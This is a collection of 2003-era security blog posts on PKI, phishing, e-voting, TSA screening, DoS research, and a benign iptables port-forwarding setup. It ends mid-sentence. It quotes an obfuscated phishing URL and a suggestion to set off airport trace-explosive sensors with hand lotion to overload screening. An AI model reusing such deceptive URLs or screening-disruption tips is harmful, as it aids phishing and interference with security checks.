Intel decided that memory pages did not need separate Read and Execute
permission bits in the TLB (only segments have separate R and X bits,
not pages). The W^X hack has to do a lot of work with TLB faults to
compensate for this simple omission.

>The Burroughs 6700 implemented a hardware solution to the problem by
>assigning 3 bits of very 51 bit memory location to the type of data
>contained.

The 432 did something similar, and the performance penalty was
astronomical. For a survey of buffer overflow attacks and defenses,
check out these papers:

"Buffer Overflows: Attacks and Defenses for the Vulnerability of
the Decade". Crispin Cowan, Perry Wagle, Calton Pu, Steve Beattie,
and Jonathan Walpole. DARPA Information Survivability Conference and
Expo (DISCEX) http://schafercorp-ballston.com/discex/, Hilton Head
Island SC, January 2000. Also presented as an invited talk at SANS
2000 http://www.sans.org/sans2000/sans2000.htm, Orlando FL, March
2000. PDF http://immunix.com/%7Ecrispin/discex00.pdf.

"Software Security for Open Source Systems". Crispin Cowan. IEEE
Security & Privacy Magazine http://www.computer.org/security/,
February 2003, Volume 1, Number 1
http://www.computer.org/security/sp2003/j1toc.htm?SMSESSION=NO,
pages 35-48. PDF
http://wirex.com/%7Ecrispin/opensource_security_survey.pdf.

Crispin Cowan, Ph.D., Chief Scientist, Immunix http://immunix.com
http://immunix.com/~crispin/ http://www.immunix.com/shop/

I still run into people who believe that PKI is a viable end-user authentication solution for the masses. My favorite were the systems that tried to solve the certificate portability problem by allowing download of certs from a website -- with only a password! The vendor couldn't see that it was no more secure than the password itself. Another case of "But this one goes to 11".

-J

PKI 'not working'

The e-envoy's office has started searching for new ways to authenticate the users of e-services as existing technology is "not working", a senior UK Government official revealed on 11 June 2003.

Although PKI (public key infrastructure) and digital certificate technology has played a major role in leading projects such as the Government Gateway, there is now growing recognition that it is unsuited for wider public use.

While digital certificates would not be scrapped, and would be retained as an option for e-service users, one possible alternative being suggested is that employers, banks, the voluntary sector and other "trusted organisations" would verify a person's identity before transacting online for services.

And now candidates are crying "security" to win elections... It works on both sides apparently.

-J

WSJ.com - Companies Cry 'Security' to Get A Break From the Government

In Kansas, utilities want to raise rates without having to tell their customers why. Elsewhere, grocers and mall owners seek tax breaks for equipment purchases. And at sports arenas, teams want to keep banner-trailing planes away from their stadiums.

Sept. 11 to the rescue.

Across America, special-interest groups are using the threat of terrorism to help them get what they want from elected officials. In framing their requests as being in the interests of national security, these groups are benefiting from lawmakers' fear of another terrorist attack in the U.S.

Catching up on draft postings, this is one that is very timely today, although it was originally penned over a year ago.

-J

Message: 6 Date: Sat, 20 Sep 2003 14:26:14 -0800 From: "Rob, grandpa of Ryan, Trevor, Devon & Hannah" Subject: Cost/benefit

In commenting on yet another pointless "homeland security" proposal, the
INFOCON mailing list passed along this quote:

"The number one threat to American national security during this long
war is neither anthrax nor truck bombs . it is uncontrolled spending. We
cannot afford to put guards on every bridge and at every critical node
of our infrastructure. We cannot afford a sophisticated chemical and
biodetector in every government building. America cannot afford a
risk-free society in a world of global terrorism. The enemy's strategy
is to destroy our economy. We must not facilitate their efforts. America
will need to spend considerable sums of money to ensure our security .
but we must do it wisely . there will be no money to waste on irrational
fear and unconscionable pork. We must develop a strategic plan to guide
our efforts. This must include federal, state and local governments,
plus the private sector. Since 9-11, more than 130 bills regarding
homeland security have been introduced in the House of Representatives.
This is not the example of spending based on a strategic plan.

"The outcome of this war will determine the type of nation our
grandchild will know. I do not want that to be a nation that is
bankrupt."

Randall Larsen, Director, ANSER Institute for Homeland Security, at the
National Defense University Symposium on Quadrennial Defense Review 2001

====================== (quote inserted randomly by Pegasus Mailer)
rslade@vcn.bc.ca slade@victoria.tc.ca rslade@sun.soci.niu.edu
Allowing an unimportant mistake to pass without comment is a
wonderful social grace. - Judith Martin
http://victoria.tc.ca/techrev or http://sun.soci.niu.edu/~rslade

I recently got a ReplayTV 5040 for a steal on closeout at buy.com and just love it. One of the most attractive features is how it is network-aware by default and that the community has created some great free software for integrating with it. I have been using DVArchive to expand the capacity for recording without having to violate my ReplayTV warranty by hacking the hardware. DVArchive enables your PC to act as a software-based ReplayTV unit for replay, archival, vending photos, as well as playing recorded mpegs remotely on your PC.

However, I was horrified at the suggestion in the DVArchive FAQ that on UNIX "you must launch DVArchive as root" if you want to enable the functionality that allows serving shows back to your ReplayTV, or to other DVArchive programs running on your network. The real reason for this is that DVArchive (due to inflexible ReplayTV design) must bind to port 80 for ReplayTV units to access the HTTP server there that vends out the mpeg files. And to do this, you normally have to be root.

Well, you could just use sudo or worse, log in as root and run DVArchive as root. But, being a security person, this was not a pleasing thought.

So, I came up with a better way that runs DVArchive as an unprivileged user on the system. I do this by using port forwarding to forward connections to port 80 up to an alternate, unprivileged high port.

Fortunately, DVArchive allows you to specify a different TCP port to listen to instead of port 80. Now, it will bark at you that what you are doing is probably going to prevent ReplayTV units from accessing files on your DVArchive server but you can safely ignore these because you've got port forwarding up your sleeve.

1) Set that port to some open high TCP port under File -> DVArchive Properties... -> Server by changing the "Server Port" setting. I used 13198 in this example and in the attached startup script.

2) Install the attached startup script (see the Extended Entry text for the full script) as root to /etc/rc.d/init.d/dvarchiveforward

3) Edit dvarchiveforward and change MYIP to point to your IP address of your DVArchive server and change the IPTABLES binary location, if necessary.

4) On a RedHat 7.x - 9 system (or any other that has chkconfig) you can active this script at boot time by running (still as root):
/sbin/chkconfig --add dvarchiveforward

5) You can then check to make sure that this script was activated by running:
/sbin/chkconfig --list dvarchiveforward
You should see output like:

dvarchiveforward 0:off 1:off 2:on 3:on 4:on 5:on 6:off

6) Now, start this script so you don't have to wait for a reboot for it to work:

/sbin/service dvarchiveforward start

7) Check to see that the port forwarding entries were inserted correctly

/sbin/iptables -t nat -L

Chain PREROUTING (policy ACCEPT)
target prot opt source destination
DNAT tcp -- anywhere yourhostname tcp dpt:http to:192.168.1.1:13198

Chain POSTROUTING (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination
DNAT tcp -- anywhere yourhostname tcp dpt:http to:192.168.1.1:13198

8) Now, you can try accessing archived shows on your DVArchive server from your ReplayTV. All should work just fine.

Within the past month or so, I received a warning from Sony about fraudulent e-mails claiming to be from Sony but that actually were not. The deceptive e-mails were designed to lure Sony customers into divulging personal information at a fake Sony site. It "falsely indicates that it is from SonyStyle.com" and "includes a link to a bogus SonyStyle.com registration site"

So, I was shocked to notice that the e-mail from Sony that was supposedly warning about deceptive e-mails and URLs was itself guilty of using apparently deceptive or "fraudulent" URLs!

Within the text, it contained a couple of URLs that, in the HTML version of the e-mail, deceptively show up as www.sonystyle.com, but in fact pointed to some other site at m0.net. Here is one of the deceptive URLs from Sony:

http://news.sonystyle.m0.net/m/S.asp?HB9483736521X2571692X218821X

Not to mention that the From address of the e-mail was also from the same site: sonystyle@news.sonystyle.m0.net

Should you trust the warning e-mail? Sure. The contents are benign enough. Just think twice about clicking those links or replying to the e-mail! Sony is surely using a company to send out the mass e-mailings and to track the "click-through" responses, but that seems like a pretty poor choice in this context!

Here is an excerpt from an e-mail I got today. If you ever get e-mail purportedly from a company that asks for you to divulge personal information, there is a high likelihood that it is one of the many social engineering attacks running around. Popular ones try to snag AOL and eBay/Pay Pal users. Be wary of what e-mails and Internet sites you trust your personal information to!!

IMPORTANT: E-MAIL HOAX NOTIFICATION

Late Wednesday afternoon, June 18, 2003, Best Buy became aware of an unauthorized and deceptive e-mail to consumers titled "Fraud Alert." That e-mail message, which requested personal information (i.e., social security and credit card numbers), claimed to come from the BestBuy.com Fraud Department. That message was NOT from Best Buy or any of our affiliates.

Best Buy is working with the appropriate law enforcement authorities to quickly resolve the situation. We are working to shut down sites affiliated with that unauthorized e-mail and Best Buy will work with law enforcement authorities to prosecute any perpetrators involved in this illegal act to the fullest extent of the law. If you replied to the fraudulent
e-mail in any way, contact your bank and/or credit card companies immediately.

No Best Buy systems have been compromised, and our online business is secure. The privacy of your personal information is of the utmost importance to Best Buy and any information you provide to us is handled according to our Privacy Policy.

1. Confidential bug report gets sent to CERT.
2. CERT sends it out to their advanced ISA (Internet Security Alliance: pay for early warning) group (Jericho calls "a vulnerability cartel)
3. The bug report is leaked out to the public, perhaps by an ISA member who was either compromised (if so, they would need more than CERT to help them...) or purposefully leaked it out

Jericho's comments on the ISN list were classic, especially:

"> CERT representatives declined to say when the organization planned
> to release official versions of the leaked advisories.

Even with leaked draft copies, CERT still can't release anything
ontime. Go figure."

Wired News: Leaked Bug Alerts Cause a Stir

John Gilmore points out how to have fun with bomb scanners by using hand lotion with Glycerine, or at least points out how easily such expensive equipment can be rendered useless. If equipment has any significant number of false-positives, be sure that it, or procedures, will tune out any hope of finding a real needle in the haystack.

Also, if you notice an "S" on your boarding pass, prepare for extra scrutiny at the airport. The TSA believes, based on often erroneous matching, that you are a member of its "Selectee" list of people who need additional security measures.

Be sure to check out EPIC's site, "Documents Show Errors in TSA's "No-Fly" Watchlist"

-----Original Message-----
From: John Gilmore [mailto:gnu@toad.com]
Sent: Sunday, May 18, 2003 3:25 PM
To: Jason C Axley Exchange
Subject: Re: The War on David Nelson

> > ... people who want to see if their name is on either list or who
> > want to make a complaint, can call the agency's contact center at
> > 866-289-9673 or send an e-mail to TellTSA@tsa.dot.gov.
>
> Since this inquiry will no doubt result in a listing where none
previously
> existed, I would suggest that everyone reading this make an inquiry -
> *especially* those of us with very common names. Let the system break
under
> it's own weight.

If you want to break the system under its own weight, I also suggest
using lots of "Kiss My Face" honey scented hand cream. Someone
recently told me setting off the nitrogylcerin censors (oops, I mean
sensors) at that spot where they wipe down your bag with little pads
and then put them through a quick chemical analysis. When she set it
off, they went down a checklist of "Did you do X recently?" until they
got to "Did you put on hand cream recently?" They let her through, of
course; you probably can't blow up an airplane with hand cream. The
problem was with their sensorship, not with her.

If even 1% of travelers refused to show an ID, the system would also
break down under its own weight. Do your part. There is no law or
regulation that requires you to show ID. You are all being sheep for
violating your own privacy, for no reason, when ordered by people who
have no authority. Demand that they show you such a law, and refuse
to show ID until they identify one. As you go up the chain of
command, you will find that you have the option to be searched rather
than show an ID. In regimes where the laws are secret, the only way
to find out what the law is, is to not follow orders.

John

PS: I doubt that sending a complaint to TSA results in them adding you
to the no-fly list. It's random and arbitrary, but not THAT random
and arbitrary. If you want to see the complaints of some of the
ordinary people who TSA mousetraps every single time they enter an
airport, (not just the David Nelsons), check EPIC's FOIA results. The
dozens of complaints forwarded via Congresspeople are well worth
reading:

http://www.plastic.com/article.html;sid=03/03/12/06265215;cmt=42

---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to
majordomo@metzdowd.com

How do you measure a cost-benefit for the new security measures or of your liberty? It is hard to even come up with a causal link from the "increased" security measures (ask me about the absurd experience I had in LAX...) to increased safety, let alone quantifying such a benefit.

There is also a discussion at http://www.plastic.com/article.html;sid=03/03/12/06265215;cmt=42

NYTimes.com Abstract

In an unusual twist on cost-benefit analysis, an economic tool that conservatives have often used to attack environmental regulation, top advisers to President Bush want to weigh the benefits of tighter domestic security against the ''costs'' of lost privacy and freedom.

David Wheeler has put together a set of design and implementation guidelines for programming securely in several languages. The document is actually in a ton of different formats, even ones suitable for Wireless devices. So, take yours with you and learn it well!

Secure Programming for Linux and Unix HOWTO

There is also a set of overview slides that are definitely worth a look.

I love the quote below and the 15 claims about how shady the Antivirus industry is are great, especially #7, "expect applause when you release hundreds of security patches for your product each year;"

Vmyths.com- Truth About Computer Virus Myths & Hoaxes

"The Pentagon should not protect a weapon system with software written by people they'd never trust. Yet they do."

Interesting work and something that I can't seem to get many people to pay attention to. Not all DoS attacks are bandwidth exhaustion attacks. DoS attacks can be thought of generically as resource exhaustion or suppression attacks. This does not necessarily require using a large amount of bandwidth.

The traditional thoughts on DoS attacks cause people to believe that normal modes of monitoring systems will catch DoS attacks early just because it would be hard to not notice such brazen resource consumption. However, low-flying attacks could possibly cause DoS attacks that are more difficult to detect without finer-grained application-level monitoring than is often employed.

This work documents attacks on the complexity of applications themselves to cause DoS.

Denial of Service via Algorithmic Complexity Attacks

We present a new class of low-bandwidth denial of service attacks that exploit algorithmic deficiencies in many common applications' data structures. Frequently used data structures have ``average-case'' expected running time that's far more efficient than the worst case. For example, both binary trees and hash tables can degenerate to linked lists with carefully chosen input. We show how an attacker can effectively compute such input, and we demonstrate attacks against the hash table implementations in two versions of Perl, the Squid web proxy, and the Bro intrusion detection system. Using bandwidth less than a typical dialup modem, we can bring a dedicated Bro server to its knees; after six minutes of carefully chosen packets, our Bro server was dropping as much as 71% of its traffic and consuming all of its CPU. We show how modern universal hashing techniques can yield performance comparable to commonplace hash functions while being provably secure against these attacks.

This scares me as a security professional. This especially scares me as a resident of Washington State.

Some gems from this interview with representatives from Sequoia systems:

Miller: "On the touch screen -- we do have the hand recounts of close races too."

Harris: "On a machine with no voter-verified paper trail?"

Miller: "Well, there's no way to do a hand recount on a DRE."

-------------

Harris: "But the positive, which can be proved, is that every election system that's ever been used in the USA has, at one time or another, been tampered with. And what we do know is that $800 million has gone toward contributions to candidates. So certainly we can predict that someone will try to tamper with a programmer. And therefore, what I'm asking, is what safeguards do we have in place to make sure that, if someone tampers with a program or a CD update --"

Miller: "I think we've gone as far as we can go."

Black Box Voting: Ballot - Tampering in the 21st Century - Interview with Paul Miller & Kathryn Ferguson (Sequoia)

A post to the IP and Risks lists is a harbinger of things to come as more and more complexity and computer-controlled systems get added to everyday devices without ensuring the same kind of quality and safety engineering. We can only hope that Ford and other car companies will not be successful in overturning laws requiring mechanical connections for safety-critical systems like steering, braking, etc.

-core24

Date: Tue, 13 May 2003 17:31:11 -0700
From: "Robert J. Berger"
Subject: MS Windows crash traps Thai politician in car (From Dave
Farber's IP)

Crashed Computer Traps Thai Politician, 14 May 2003
http://aardvark.co.nz/daily/2003/n051301.shtml

Thailand's Finance Minister Suchart Jaovisidha had to be rescued today
from
inside his expensive BMW limousine after the onboard computer crashed,
leaving the vehicle immobilized.

Once the computer failed, neither the door locks, power windows nor air
conditioning systems would function, leaving the Minister and his driver
trapped inside the rapidly heating vehicle.

Despite the pair's best efforts, it took a full ten minutes before they
were
able to summon the attention of a nearby guard who freed the two men by
smashing one of the vehicle's windows with a sledgehammer.

A report (http://www.bangkokpost.com/Business/13May2003_biz12.html)
published in the *Bangkok Post* indicates that the vehicle was Mr
Jaovisidha's own BMW 520 which was being used while his state-supplied
Mercedes, was being repaired.

BMW's more up-market 7-series range uses a computer system called
i-drive
which has Microsoft's WindowsCE at its core.
http://www.microsoft.com/presspass/press/2002/Mar02/03-04BMWpr.asp

Did Mr Jaovisidha narrowly miss being killed by the blue windscreen of
death?

Robert J. Berger - Internet Bandwidth Development, LLC.
Voice: 408-882-4755 eFax: +1-408-490-2868
http://www.ibd.com

IP Archives at:
http://www.interesting-people.org/archives/interesting-people/

[At least 33 readers have noted this one thus far. TNX! PGN]

A couple more sites working against all-electronic voting machines:

http://www.blackboxvoting.com/
http://www.ecotalk.org/VotingSecurity.htm

Also, an article discussing a situation that, if true, is truly egregious:

The senator who won the election in Nebraska allegedly "was the head of, and continues to own part interest in, the company that owns the company that installed, programmed, and largely ran the voting machines that were used by most of the citizens of Nebraska."

The bigger issue, in my opinion, is not whether the senator had rigged his election but the fact that we are entirely unable to verify whether this occurred or not. With a voter verifiable and recountable audit trail, we could.

I sure hope so. I have high expectations for Windows 2003. We'll see how things progress.

I want to know who the companies are that were surveyed... I assure you mine wasn't one of them.

Commentary: Can Microsoft be secure? | CNET News.com

Customers worry about Microsoft's security: Seventy-seven percent of respondents to a Forrester survey cited security as their top concern about deploying Windows. Despite those concerns, 89 percent of users are still deploying sensitive applications like financial transaction systems and medical records databases on Windows.

[IP] NIST rates facial recognition systems

"The three top-rated systems verified identities correctly 87 percent to 90 percent of the time with a false-alarm rate of 1 percent. When NIST specified a false-alarm rate of 0.1 percent, the success rate dropped to between 79 percent and 82 percent."

From the report itself:

"Typically, the watch list task is more difficult than the identification or verification tasks
alone. Figure 8 shows detection and identification rates for varying watch list sizes at a false alarm rate of 1%. For the best system using a watch list of 25 people, the detection and identification rate is 77%. Increasing the size watch list to 3,000 people, decreases the detection and identification rate to 56%."

This means that such systems would still result in fingering plenty of innocent people as terrorists.

A practical, statistical look at the civil rights implications of this problem, endemic to the NCIC database as well, can be found in the April 2003 Crypto-Gram

In related news, from an earlier Crypto-Gram:

"The SmartGate facial recognition trial at Sydney Airport has suffered
an embarrassing setback, when two Japanese visitors fooled the system
simply by swapping passports.
http://email.ni.com.au/Click?q=aa-gBTeQXUc2wTVl8iWEhuEcIDY"

Software quality, especially data input filtering, is critical for mobile devices; especially devices that do not typically have user-updateable software.

News: Mobile phone hacking expected to spread

United States-based security company @stake has released a security advisory detailing a Denial of Service (DoS) vulnerability in the Nokia 6210 GSM mobile phone, and although the flaw isn't serious it could be a sign of worse things to come.

This analysis shows how DRM solutions are ineffective because they [attempt to] address the wrong threat model.

"Many DRM advocates make the classic mistake of refusing to choose a threat model. When they complain about the problem, they seem to be using the Napsterization model -- they talk about one infringing copy propagating across the world. But when they propose solutions they seem to be solving the casual-copying problem, asking only that the technology keep the majority of customers from ripping content. So naturally the systems they are building don�t solve the problem they complain about."

Freedom To Tinker: DRM, and the First Rule of Security Analysis

Evidence of the damage that insider attacks can wreak. Ironically, this was a security software distributor.

It's unbelievable how often I hear things like:

"Well you have to trust your employees/administrator/etc!"
"But we're behind the firewall!"

I even noticed Microsoft's STRIDE threat model does not include the threat:

Misuse of granted privileges.

Whoops. People all too often don't look inside their own organizations at the threats all around you. Insider attackers are a difficult, and perhaps not entirely solveable problem. It is much easier for someone to attack your network when they are already on it than through your firewall over the Internet. Your firewall rejects access, but then your HR department allows it. They will even give a potential adversary a computer, cubicle, network access, badge, etc.!

You have to consider this angle in designs and in how you manage privileges and maintain audit trails.

"Security software distributor, Janteknology, has shutdown amidst dramatic circumstances, its battle to survive tough market conditions ended by industrial sabotage."

News: Security firm shuttered by sabotage

USACM co-chair Barbara Simons spoke out against sections of the DMCA during recent Congressional review of the DMCA's anti-circumvention provisions.

ACM MemberNet

You can also read the transcript of Simons' testimony

"During a time when our nation is devoting unprecedented resources to homeland security, we should be eliminating laws such as the DMCA that encourage insecurity,"

Here is a 176-page PDF paper on the fallacy of polygraph exams (a.k.a. "lie" detectors). I have not read up on this subject in some time but this looks to be a good read.

Lie Behind the Lie Detector

Found out about this great site through this month's Crypto-Gram newsletter. It posts articles on -- you guessed it -- all the stupid security measures people come across.

Stupid Security: Exposing Fake Security Since 2003

A great article with some perfect quotes from leading advocates and experts for voter verifiable audit trails. Also, there are some documented cases of voting machine errors in the article.

New Voting Systems Assailed

New Voting Systems Assailed
Computer Experts Cite Fraud Potential

By Dan Keating
Washington Post Staff Writer
Friday, March 28, 2003; Page A12

As election officials rush to spend billions to update the country's
voting machines with electronic systems, computer scientists are
mounting a challenge to the new devices, saying they are less reliable
and less secure from fraud than the equipment they are replacing.

...

"These systems, because of the level of testing they go through, are
the most reliable systems available," said Michael Barnes, who oversaw
Georgia's statewide upgrade. "People were happy with how they
operated."

....

But the scientists' campaign, which began in California's Silicon
Valley in January, has gathered signatures from more than 300 experts,
and the pressure has induced the industry to begin changing course.

....

Critics of such systems say that they are vulnerable to tampering, to
human error and to computer malfunctions -- and that they lack the
most obvious protection, a separate, paper receipt that a voter can
confirm after voting and that can be recounted if problems are
suspected.

Officials who have worked with touch-screen systems say these concerns
are unfounded and, in certain cases, somewhat paranoid.

David Dill, the Stanford University professor of computer science who
launched the petition drive, said, "What people have learned
repeatedly, the hard way, is that the prudent practice -- if you want
to escape with your data intact -- is what other people would perceive
as paranoia."

Other computer scientists, including Rebecca Mercuri of Bryn Mawr
College, say that problems are so likely that they are virtually
guaranteed to occur -- and already have.

...

"If the only way you know that it's working incorrectly is when
there's four votes instead of 1,200 votes, then how do you know that
if it's 1,100 votes instead of 1,200 votes? You'll never know," said
Mercuri.

Because humans are imperfect and computers are complicated, said Ben
Bederson, a professor of computer science at the University of
Maryland, mistakes will always be made. With no backup to test, the
scientists say, mistakes will go undetected.

"I'm not concerned about elections that are a mess," Dill said. "I'm
concerned about elections that appear to go smoothly, and no one knows
that it was all messed up inside the machine."

"We're not paranoid," said Mercuri. "They're avoiding computational
realities. That's the computer science part of it. We can't avoid it
any more than physical scientists can avoid gravity."

"Nokia 7650 upgrade - hoax

An internet hoax is traveling round the internet that purports to be a
press release from Nokia offering an upgrade for owners of the Nokia
7650 handset to support a series of new features.

The press release says that "Nokia today announced after months of
speculation and rumours that it will be re-releasing it's flagship
Symbian OS phone, the 7650, with the long awaited increased memory
capabilities.

The new 7650 will remain branded as 7650 but will have the added feature
of an MMC expansion bay and support for Bluetooth Audio."

There is a web site address for the press release, that at first look,
does look like a Nokia web site address - but the @ symbol in the middle
of the URL actually causes browsers to ignore everything before it, and
the remainder of the address is a web page on a totally different
server. "

One of the URLs looks like this, so you can see how someone could be easily tricked into believing it as legitimate:

http://press.nokia.com~id=@%31%39%34%2e%31%36%34%2e%32%30%2e%38/release/7650.htm

The page no longer works, but you need to be very diligent online and can't trust everything you read. Someone could easily hide this URL in some inocuous text so you would not easily notice the underhandedness: Nokia fake press release

Read more about these same techniques that spammers often use to trick you at Stupid Spam Tricks.

A press release on RSA's website announces that a unanimous verdict was reached on all infringement claims in favor of the defendants, RSA Security Inc. and Verisign Inc.

RSA Security | RSA Security Wins SSL Patent Infringement Trial

Rob Slade takes an in-depth look at what the National Cybersecurity Strategy is for security education and doesn't really find much. To summarize:

"we [the U.S. Gov't] can't do it alone, so we're not going to do anything"

"How will it happen?"

"Focus or force?"

"Security awareness cannot be promoted by establishing contests where nobody will compete."

"Again, this proposal sounds good, but, without details to back it up, I doubt that there will be any impact any time soon"

"Subject to budget considerations. No further comment needed."

"What incentive do those companies have to do so? "

"How about funding?"

"OK, the government doesn't want to help or fund certification, but wants to dictate what the certification is for."

"I imagine AV and firewall vendors will be delighted that the government will be advertising for them"

The document seems to say a lot but does not seem as if it will actually do anything.

Read the full analysis in Risks 22.63, article 1

There was voluminous and heated discussion on the cryptography mailing list about the dangers of the paper audit trail for e-voting that is being pushed by the e-voting academic experts. The instigator and perpetuator of the discussion was Ed Gerck.

His main criticism was that the paper audit trail does not address the problems of massive external vote tampering by extortion (vote this way and prove you voted this way or I'll kill you) or vote selling (vote republican, prove it to me, and I'll pay you $$). He is afraid that the paper audit trail will be just the thing that can be photographed as proof of your vote to enable these system.

Rebecca Mercuri replied:

"The whole idea of photographing paper ballots is a straw man. It is akin to saying that people
will just run through red lights anyway so we shouldn't place them at intersections."

This seemed to sum up my thoughts on the complaint. He seemed to be arguing for throwing the baby out with the bathwater, saying "[printing paper receipts] creates problems that are even harder to solve than the silent subversion of e-records"

He included criticism later on that a paper audit trail does not really make e-voting systems any better than existing paper-based systems and seemed to argue that it is academically uninteresting. I think that this is exactly the point though: nobody has yet come up with an entirely electronic voting system that solves the fundamental problem that a paper audit trail solves. It may be unsatisfying, but what I think is far more unsatisfying are the voting districts that are ignoring this academic result and swapping out systems with unverifiable ones. People need to understand the limits and risks of electronic systems.

Rebecca's most interesting statement for me was:

"The salient requirement of Democratic elections is that the voters must be assured that their ballots are recorded and tabulated as cast. If the process is such that it can only be understood by a team of
scientists with Ph.D.'s, the average citizen can have no confidence that their voice is being heard."

She ended her posting with a response to the criticism:

"I have never said that the paper balloting solution is a perfect one, but it provides assurances in a human-accessible format that is a considerable improvement over both the black-box systems and the chad-based ones.If you can devise a system that is equally user-friendly and has the same ability for independent auditing, then please do so."

The discussion ended with that.

I will have to check this out. Although, I have several piles of other publications to whittle down first.

"The IEEE Computer Society has created a new magazine called "Security and Privacy" specifically for the security community The magazine intends to present a balanced mix of scientific research and practical security discussion. "

This story about 16M Yen (~$136,000) stolen from someone's CityBank online banking service after the user's password was compromised at an Internet cafe highlights the tremendous risk of insecure client computers. It does not make a darned bit of difference what crypto strength you were to use, it is so trivial to install a keystroke capture device that nobody would ever notice that will catch everything before it is encrypted.

"Using encryption on the Internet is the equivalent of arranging an armored car to deliver credit-card information from someone living in a cardboard box to someone living on a park bench." -- Gene Spafford

The trend toward SSL-based VPNs and Internet-enabling everything under the sun leads to uncontrolled client-side access that significantly increases this risk. Gartner is "bullish" on these SSL-based VPNs but I'm not convinced that their convenience outweighs the increased risk in many cases. You would need to deploy token authentication at a minimum with these solutions but you would still be at risk of general data compromise. In any company with a large amount of employees, training everyone to not use their personal computer, a library computer, an Internet cafe computer, etc. to access such a solution would be difficult and not entirely effective. Users will choose the convenience over security much (all?) of the time.

Full story below and at CNN.com

From RISKS 22.61.

"A Krispy Kreme doughnut shop in Albuquerque seemingly greased its coffers
while figuratively deep-frying over two dozen customers. Irrespective of
what they ordered, each of 28 customers using a credit card were charged
EXACTLY $84,213.60 for the purchase. "

The PGN comments simply made the posting though:

[These charges were actually APPROVED, and of course also blew the
customers' credit ratings for a few days. Amazing!
``The $84,000 charge, were it legitimate, would have purchased over
170,000 ... doughnuts, enough to stretch over 9 miles if placed
end-to-end.'' ...

BlackBox Voting is reporting on a whistleblower lawsuit filed here in Washington state by a software engineer against his former employer VoteHere. He alleges that he was wrongfully terminated to silence his complaints while third party "certification" of the VoteHere system was being conducted. The lawsuit enumerates many of the system's flaws that he documented in defect reports. It is a must-read.

In other unbelievable news, Santa Clara County, CA and Collins County, TX both voted for electronic voting machines without paper audit trails against all sound advice from experts around the world. Santa Clara County reportedly cited the same kinds of "certifications" as evidence that the system is okay without the voter verifiable audit trail.

Many of the attacks described are social engineering attacks and not computer security holes. I can't believe the mumbling attacks--hilarious! Social engineering attacks are very hard to defend against, especially with huge callcenters like AOL must have.

AOL customers beware your privacy. AOL not only makes it easy to get on the Internet, they make it easy for others to get on the Internet as you too!

"Using a combination of trade tricks and clever programming, hackers have thoroughly compromised security at America Online, potentially exposing the personal information of AOL's 35 million users. "

Wired News: Hackers Run Wild and Free on AOL

The March 3 Security Wire Digest and Reuters are reporting that:

"Leon Stambler, who has won financial settlements from companies such as
National Cash Register, First Data and Openwave Systems, seeks up to $20
million in the federal suit, being heard in Delaware. "

"Certicom and Openwave each paid $400,000 plus ongoing royalty fees for their licenses and First Data paid $4 million, he testified. "

He is suing RSA Security and Verisign now, trying to extract money. Ugh.

The companies are arguing that his invention (patented in 1992) is distinct from SSL. SSL was developed in 1994 and patented in 1997, according to the Reuters article.

The Reuters story is here

"Two Alberta men with a passion for locating and mapping wireless
computer networks have come under the scrutiny of Canada's spy agency."

"The press release, which also included Mr. Kaczor's name and contact information, featured the tongue-in-cheek headline "Wireless hackers invade Red Deer!""

High-tech hobby falls under CSIS suspicion

[IP] Pondering Value of Copyright vs. Innovation

"Technology scholars, business leaders and policy makers gathered at California
conferences this weekend to argue whether a mismatch between two different technologies and the legal policies that govern them could inhibit free expression and innovation. "

""We have ceded too much power to copyright owners," said Ms. Lofgren, who plans on Tuesday to reintroduce a bill that would amend the 1998 law. "People are afraid to proceed on innovative measures.""

Among other nasty things, the US government is trying to make the use of encryption while committing a crime over a computer a new crime that would add 5 years onto your sentence, if convicted.

"If you order a book from Amazon.com and fail to pay state tax, the SSL session with Amazon supports a five year felony. [RFF - I'd also include using GSM cell phones with the built-in encryption....]"

The ACLU has a section-by-section analysis for the full dose of insanity.

[IP] Outlawing Encryption under PATRIOT II

Several members of congress have sent an open letter to John Ashcroft chiding him for the administration's handling of PATRIOT II. The Justice Department is being very secretive about this new act, even lying to congress about its existence even though it has been leaked on the Internet.

From the FoxNews story:

"If there's going to be a sequel let's find out what it's going to be" before reading about it in the newspapers, Leahy said, accusing the Justice Department of lying to his staff about whether a new bill was in the works.

Keep this handy for the next MS Worm. Posted to RISKS 22.53: .
[From Pete Lindstrom, Spire Security, petelind@spiresecurity.com]

*<adjective> Computer Worm <verb> Internet*

In the wee hours of <date>, a <adjective> computer worm spread <adverb>
throughout the Internet. Dubbed <silly name> because <ridiculous reason
that doesn't explain anything about how it works>, and also known as
<another random name> and <another random name>, the worm has infected
an estimated <number> systems within <length of time>. Experts are
calling this worm the most <adjective> since <date in the past>.

The worm exploits a hole in <Microsoft product name> that was first
identified <number> months ago by <security company name>...

The BSA (Business Software Alliance) is now taken to sending out threatening letters based on the results of a web/ftp spider search for the word "Office". The RIAA has done similar things in searching for "pirated" music by keyword and then automatically mailing.

From the BSA letter:

"What was located as infringing content:
------------------------------
Filename: /mandrake_current/SRPMS/OpenOffice.org-1.0.1-9mdk.src.rpm (199,643kb)
Filename: /mandrake_current/i586/Mandrake/RPMS/OpenOffice.org-libs-1.0.1-9mdk.i586.rpm (35,444kb)"

OpenOffice.org thread

Anyone have a clue stick handy?

tecChannel reverse-engineered Windows Update to find that it can spy on other installed applications. It is unclear whether it actually does spy though. Although an article at The Inquirer claims as much.

They are offering a utility that you can run yourself to spy on the spyware. You have to pay 1.99 Euro for the full article and get the software included. A summary can be found for free though at The Inquirer.

"The information can pass on to Microsoft a list of all of the software installed on an individual's computer, including software manufactured by other manufacturers."

There is a slashdot story as well.

An article update shows a dump of what a hardware configuration looks like being sent to Microsoft.

Just heard an NPR story on the Santa Clara e-voting saga. A vote today did not decide on whether they would only go with a system with a paper ballot. Only to test such a system.

The Sequoia company representative (the chosen product) admitted that they only agreed to add the paper ballot because they listen to customer demands. He didn't think it was necessary though.

"Officials in California's Santa Clara County learn that those who know computers best have the biggest concerns about them. That county, home to Silicon Valley, is deciding on an electronic voting system. But a computer scientist fights to keep old-fashioned paper in the voting process. NPR's Andy Bowers reports."

Listen here:
Real Audio link

Check out the 128 pages of documentation. page 13 is interesting and the discussion on page 23 that the "prevailing view is that proprietary source code should not be readily available for obvious security [ed: obscurity] reasons"

Page 27 has a discussion of the "security" for modem data transmissions of vote totals in the ES & S iVotronic product. It's good for a laugh. Here's their modem "security":

